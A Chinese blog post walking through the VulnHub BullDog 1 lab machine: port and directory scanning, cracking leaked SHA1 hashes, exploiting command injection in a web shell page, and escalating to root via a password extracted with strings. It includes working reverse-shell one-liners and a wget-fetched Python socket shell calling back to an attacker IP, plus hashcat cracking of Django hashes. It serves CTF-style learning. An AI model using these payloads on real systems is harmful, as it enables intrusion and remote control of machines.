【VulnHub】BullDog 1复盘

最新推荐文章于 2022-07-31 13:59:37 发布
最新推荐文章于 2022-07-31 13:59:37 发布
阅读量746 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/redwand/article/details/104299033
版权

实验环境:
靶机:192.168.0.191
攻击机kali:192.168.0.103

一、信息收集

1、masscan扫端口

root@redwand:~# masscan -p0-65535 --rate=2000 192.168.0.191

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-02-13 09:11:43 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 8080/tcp on 192.168.0.191
Discovered open port 23/tcp on 192.168.0.191
Discovered open port 80/tcp on 192.168.0.191

2、nmap扫端口版本、漏洞

root@redwand:~# nmap -sC -sV -p23,80,8080 192.168.0.191
PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|   256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_  256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 78:4F:43:6B:E0:E8 (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3、入手分析80端口(8080相同)。whatweb分析指纹信息,可用-v显示详细,发现web位django框架开发。

root@redwand:~# whatweb 192.168.0.191
http://192.168.0.191 [200 OK] Country[RESERVED][ZZ], maybe Django, HTML5, HTTPServer[WSGIServer/0.1 Python/2.7.12], IP[192.168.0.191], JQuery, Python[2.7.12], Script, Title[Bulldog Industries], X-Frame-Options[SAMEORIGIN]

4、dirb扫目录

root@redwand:~# dirb http://192.168.0.191

START_TIME: Thu Feb 13 04:23:03 2020
URL_BASE: http://192.168.0.191/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.0.191/ ----
==> DIRECTORY: http://192.168.0.191/admin/
==> DIRECTORY: http://192.168.0.191/dev/
+ http://192.168.0.191/robots.txt (CODE:200|SIZE:1071)

---- Entering directory: http://192.168.0.191/admin/ ----
==> DIRECTORY: http://192.168.0.191/admin/auth/
==> DIRECTORY: http://192.168.0.191/admin/login/
==> DIRECTORY: http://192.168.0.191/admin/logout/

---- Entering directory: http://192.168.0.191/dev/ ----
==> DIRECTORY: http://192.168.0.191/dev/shell/

---- Entering directory: http://192.168.0.191/admin/auth/ ----
==> DIRECTORY: http://192.168.0.191/admin/auth/group/
==> DIRECTORY: http://192.168.0.191/admin/auth/user/

---- Entering directory: http://192.168.0.191/admin/login/ ----

---- Entering directory: http://192.168.0.191/admin/logout/ ----

---- Entering directory: http://192.168.0.191/dev/shell/ ----

---- Entering directory: http://192.168.0.191/admin/auth/group/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')

---- Entering directory: http://192.168.0.191/admin/auth/user/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')

-----------------
END_TIME: Thu Feb 13 04:25:07 2020
DOWNLOADED: 32284 - FOUND: 1

5、遍历目录、文件,在http://192.168.0.191/dev/页面源码中发现hash。

	<!--Need these password hashes for testing. Django's default is too complex-->
	<!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
	Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
	Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
	Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
	Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
	Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
	Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
	Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->

6、somd5解密获得两组账号密码:nick:bulldog,sarah:bulldoglover。通过http://192.168.0.191/admin/login/页面登陆后,发现http://192.168.0.191/dev/shell/页面可用。通过命令测试,发现该shell存在&&命令执行漏洞。遇到远程命令,一般用wget拉马。
在这里插入图片描述

二、getshell

方法一:bash反弹

echo "/bin/bash -i >& /dev/tcp/192.168.0.103/6666 0>&1" | /bin/bash

方法二:命令执行bash -c反弹

ls && bash -c 'bash -i >& /dev/tcp/192.168.0.103/6666 0>&1'

方法三:python反弹
ls && wget http://192.168.0.103/shell.py
ls && python shell.py

import socket
import subprocess
import os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.103",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/bash","-i"])

错误一:
ls && bash -i >& /dev/tcp/192.168.0.191/6666 0>&1 #服务器500
错误二:
ls && wget http://192.168.0.103/msfma
ls && ./msfma #服务器500

三、提权

1、反弹回来的shell非交互式shell,python导入pty得到交互式shell。

django@bulldog:/home/django/bulldog$ su -
su -
su: must be run from a terminal
django@bulldog:/home/django/bulldog$ python -c 'import pty;pty.spawn("/bin/bash")'
</bulldog$ python -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$ su -
su -
Password: l

2、查看敏感文件/etc/passwd,/etc/group,发现bulldogadmin,django有sudo权限。

django@bulldog:/home/django/bulldog$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
bulldogadmin:x:1000:1000:bulldogadmin,,,:/home/bulldogadmin:/bin/bash
django:x:1001:1001:,,,:/home/django:/bin/bash

django@bulldog:/home/django/bulldog$ cat /etc/group | grep sudo
sudo:x:27:bulldogadmin,django

3、进入各用户家目录发现.sudo_as_admin_successful文件,确认sudo曾经成功执行。
4、在bulldogadmin家目录下发现app应用二进制文件customPermissionApp。

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ ls -l
total 16
-rw-r--r-- 1 bulldogadmin bulldogadmin 8728 Aug 26  2017 customPermissionApp
-rw-rw-r-- 1 bulldogadmin bulldogadmin  619 Sep 21  2017 note

5、通过strings命令在app文件中获取密码:SUPERultimatePASSWORDyouCANTget

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ strings customPermissionApp
...
GLIBC_2.2.5
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(
..

6、通过sudo提权成功,也可以sudo /bin/bash,得到congrats.txt文件。

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ sudo su -
passwd:SUPERultimatePASSWORDyouCANTget
root@bulldog:~# cat congrats.txt
Congratulations on completing this VM :D That wasn't so bad was it?
Let me know what you thought on twitter, I'm @frichette_n
As far as I know there are two ways to get root. Can you find the other one?
Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!
四、花絮

1、提权过程在家目录下发现敏感文件db.sqlite3

django@bulldog:/home/django/bulldog$ ls -l
total 48
drwxrwxr-x 4 django django  4096 Aug 24  2017 bulldog
-rwxr-xrwx 1 django django 40960 Feb 13 09:36 db.sqlite3
-rwxr-xr-x 1 django django   250 Aug 16  2017 manage.py

上传msf马将文件下载回本地,在数据库auth_user表中找到django的hash值。

root@redwand:~# sqlite3 db.sqlite3
SQLite version 3.27.2 2019-02-25 16:06:06
Enter ".help" for usage hints.
sqlite> .tables
auth_group                  auth_user_user_permissions
auth_group_permissions      django_admin_log
auth_permission             django_content_type
auth_user                   django_migrations
auth_user_groups            django_session
sqlite> select * from auth_user;
1|pbkdf2_sha256$20000$9k0TYJltYWk5$rE0aQA4DGFxEjBhBH0BEJhFsF2Jx63690a8VGE/9a+c=|1|admin|||admin@bulldogindustries.com|1|1|2017-08-18 22:42:27.888865|2017-08-19 06:14:22.419010
3|pbkdf2_sha256$20000$AvMG3SPMFdWk$br74kiJcinPLKkqG+i9G+2MavMVW9IXDl2TSeQ5My+A=|0|alan||||1|1|2017-08-19 05:57:32|
4|pbkdf2_sha256$20000$LgCCwZ1qFhSK$xv2NHkto76GEp11lXNUFPsiolvoV8c8R/PRl2/XccX0=|0|william||||1|1|2017-08-19 06:02:07|
5|pbkdf2_sha256$20000$IjvfpwWo8tw9$9PZgYsZCcRz3dLVU/4TnXa9i2VcybBnBedCyNjk3Sak=|0|malik||||1|1|2017-08-19 06:02:50|
6|pbkdf2_sha256$20000$ooicdWHyxlTk$oNMBAZDKarihoPIzzYAhDq+4cR8JtJGt9JQIA8q1SX8=|0|kevin||||1|1|2017-08-19 06:03:22|
7|pbkdf2_sha256$20000$nmdkvhu3yqa9$8VSo44h9fXYj6FLavolYDZ7P5PhFBLeKBmLkBlNpGTk=|0|ashley||||1|1|2017-08-19 06:04:18|
8|pbkdf2_sha256$20000$QFeEaqreqK8o$ldGl5qhFnyB+tFrOflSwxSGO3Xt/mL4sjBiCPyPusU4=|0|nick||||1|1|2017-08-19 06:06:08|2020-02-12 02:12:15.579164
9|pbkdf2_sha256$20000$lA6iOt4XGXLw$0VHpbYjNiFN4CnHisuB+bFh72A6sn03Q+d34Laj7jkM=|0|sarah||||1|1|2017-08-19 06:06:56|
sqlite> .schema auth_user
CREATE TABLE IF NOT EXISTS "auth_user" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "password" varchar(128) NOT NULL, "is_superuser" bool NOT NULL, "username" varchar(30) NOT NULL UNIQUE, "first_name" varchar(30) NOT NULL, "last_name" varchar(30) NOT NULL, "email" varchar(254) NOT NULL, "is_staff" bool NOT NULL, "is_active" bool NOT NULL, "date_joined" datetime NOT NULL, "last_login" datetime NULL);

将hash值保存在hash.txt使用hashcat进行爆破,爆破出相同两个密码,无果结束。

root@redwand:~# hashcat --force -m 10000 hash.txt pass.txt --show
pbkdf2_sha256$20000$QFeEaqreqK8o$ldGl5qhFnyB+tFrOflSwxSGO3Xt/mL4sjBiCPyPusU4=:bulldog
pbkdf2_sha256$20000$lA6iOt4XGXLw$0VHpbYjNiFN4CnHisuB+bFh72A6sn03Q+d34Laj7jkM=:bulldoglover

2、在django家目录发现manage.py,且django具有写权限。查看进程,发现该进程实际为root切换到django执行的进程,故无法通过其提权。

django@bulldog:/home/django/bulldog$ ps aux | grep manage
ps aux | grep manage
root        80  0.0  0.0      0     0 ?        S<   09:07   0:00 [charger_manager]
root       919  0.0  0.0   4508   756 ?        Ss   09:07   0:00 /bin/sh -c cd /home/django/bulldog && sudo -u django python /home/django/bulldog/manage.py runserver 0.0.0.0:8080 --insecure
root       932  0.0  0.1  52704  3896 ?        S    09:07   0:00 sudo -u django python /home/django/bulldog/manage.py runserver 0.0.0.0:8080 --insecure
django     939  0.0  1.5  71988 31080 ?        S    09:07   0:00 python /home/django/bulldog/manage.py runserver 0.0.0.0:8080 --insecure
django    1007  1.3  1.9 642136 38996 ?        Sl   09:07   1:01 /usr/bin/python /home/django/bulldog/manage.py runserver 0.0.0.0:8080 --insecure
django    1650  0.0  0.0  14224   940 pts/0    S+   10:21   0:00 grep manage

3、在bulldog目录读settings.py文件,由于使用sqlite3,无账号密码信息,若mysql则有。

django@bulldog:/home/django/bulldog/bulldog$ ls
ls
__init__.py   settings.py   static     urls.py	 views.py   wsgi.py
__init__.pyc  settings.pyc  templates  urls.pyc  views.pyc  wsgi.pyc
redwand
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用masscan扫描以及相关优化
Tide的小家
11-27 8036
使用py优化扫描结果
vuInhub靶场实战系列-bulldog-1
最新发布
06-03
vuInhub靶场实战系列-bulldog-1
Bulldog1
haha1314的博客
05-20 667
一、 收集信息 1、 扫描存活主机,找到目标机的ip 2、 扫描目标机的端口信息。 说明可以通过80或8080来访问它 3、 查看一些指纹信息 4、因为是自己搭的所以不需要被动收集 二、 web渗透 1、通过访问发现没有神什么可用信息,就两个页面,审查里面元素也没有可用信息。 2、 扫目录 扫出来目录不多,可以打开看看,也可以用自己的字典 多了一条 http://192.168.88...
charles 本地IP地址
an168bang521的博客
09-20 4920
本文参考:charles 本地IP地址 手机进行抓包时候,再wifi里面需要这是这个; 比如我的IP是:192.168.0.103,那么手机如果抓包,就要再代理设置成这个IP; 端口查看参见:charles 代理设置 默认是:8888 本文参考:https://www.axihe.com/ ...
Exchange ProxyShell复现
ruyueattention
10-09 5338
0x1 参考链接 https://blog.csdn.net/qq_41874930/article/details/120037619 https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell https://www.4hou.com/posts/8Wp2 https://peterjson.medium.com/repr
服务器系统 能使用投影仪不,当贝投影的SMB服务是什么?投影仪可以直接看电脑上的视频吗?...
weixin_42322782的博客
08-13 868
原标题:当贝投影的SMB服务是什么?投影仪可以直接看电脑上的视频吗?当贝投影D1在经过一次系统升级后,很多朋友都发现更新说明上有一条"新增SMB服务",不太明白这是什么意思。其实SMB服务的意思很简单,一起来看看吧。 SMB服务是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。...
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
bulldog_shop
05-09
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
French Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的French Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
CentOS7搭建Docker私有仓库
weixin_33762130的博客
11-10 122
  学习Docker的过程中Docker的私有仓库一直没能成功,就是因为CentOS 6.x和CentOS 7默认引入了支持https认证,每次在push和pull的时候都会报错,今天是周末,利用一天的时间反复测试和网上案列的整合,总算是成功了,也借此 机会对学习Docker的朋友有所帮助。 个人的愚见:博友在练习的时候建议用CentOS 7.x系统,不建议用CentOS 6.x系统   ...
利用注册表修改windows的3389端口
徐火军博客
03-12 6730
Windows 系统中的远程终端服务是一项功能非常强大的服务,同时也成了入侵者长驻主机的通道,入侵者可以利用一些手段得到管理员账号和密码并入侵主机。下面,我们来看看如何通过修改默认端口,防范黑客入侵。  众所周知,远程终端服务基于端口3389。入侵者一般先扫描主机开放端口,一旦发现其开放了3389端口,就会进行下一步的入侵,所以我们只需要修改该务默认端口就可以避开大多数入侵者的耳目。  步骤:打开
树莓派常用命令
QQ547176052的博客
09-30 1177
刷系统 格式化 这样就ok了 开启ssh 刷完系统在boot盘跟目录创建文件ssh就可以了小写不需要后缀 汉化 sudo raspi-config 选4 再选1 然后把 4个前面是 zh_cn的 用(空格选中) 然后 ok 选zh_CN utf_8 重启 sudo ...
linux如何查看本机名称,Linux查看本机登陆用户信息(w、who、last和lastlog命令)...
weixin_39622178的博客
05-14 333
如果我们想要知道 Linux 服务器上目前已经登录的用户信息,则可以使用 w 或 who 命令来进行查询。w 命令先看看 w 命令,如下:[root@localhost ~]# w09:54:22 up 9:50, 2 users, load average:0.00, 0.00, 0.00USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATroot tty1 - 09...
asp.net core系列 74 Exceptionless服务端安装
Globalizationa的博客
04-16 427
一. Docker安装   Docker 要求版本Docker 18.09.0+以上   安装地址:https://www.runoob.com/docker/windows-docker-install.html   1.操作系统win10系统,在启用或关闭Windows功能中,开启hyper-v,安装后占用磁盘大小2.84 GB。   2.安装后,在cmd中使用docker version查看版本信息为19.3。在电脑右下角有个小鲸鱼图标,在服务器每次重启后,docker进程会自动开启。   ...
新老电脑的文件/数据同步记录
qq_42033668的博客
07-31 1040
新老电脑/笔记本数据同步记录博主由于前段时间买了一台笔记本,老电脑的数据同步成了困扰,本文就介绍博主同步数据的详细过程。HFS,它是一种上传文件的软件。有的朋友会问,不是可以用网络共享吗,博主已经试过了,一个项目都扫描了5分钟,更别说19个g的项目还要传输了,比U盘还慢。1.nfs不能传输隐藏文件2.U盘复制,如果项目中很多小文件不建议3.常用的软件注册/登录账号看看有没有同步/导出的功能,省去了新电脑需要重新设置的麻烦......
Android入门:文件上传
wyyother的专栏
07-18 449
文件上传分为两个部分: (1)服务器端:需要使用FileUpload+common.io实现文件的上传; (2)客户端:需要模拟文件上传的HTTP请求头; 一、服务器端代码 FileServlet.java [java] view plaincopy package org.xiazdong.servlet;    import java.i
linux+cp+no+match,ngrep - 适用于Linux的网络数据包分析器
weixin_39626131的博客
05-16 351
Ngrep ( 网络grep )是一个简单但功能强大的网络数据包分析器。 它是一种应用于网络层的类似grep的工具 - 它匹配通过网络接口传递的流量。 它允许您指定扩展的常规或十六进制表达式,以匹配数据包的数据有效负载(传输数据中的实际信息或消息,但不包括自动生成的元数据)。此工具适用于各种类型的协议,包括IPv4 / 6,TCP,UDP,ICMPv4 / 6,IGMP以及许多接口上的Raw。可以...
Android手机访问Django测试服务器方法
青衫折扇的博客
07-17 1589
服务器用django搭建,今天在测试Android连接django服务器。看文档是说让别人连接到服务器是通过python manage.py runserver 0.0.0.0:8000命令实现。在电脑上直接访问0.0.0.0:8000就可以了,也可以访问:8000这个端口,根据个人习惯,“0.0.0.0″ 这个 IP 地址是告诉服务器去侦听任意的网络接口,手机访问需要0.0.0.0 pytho...
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值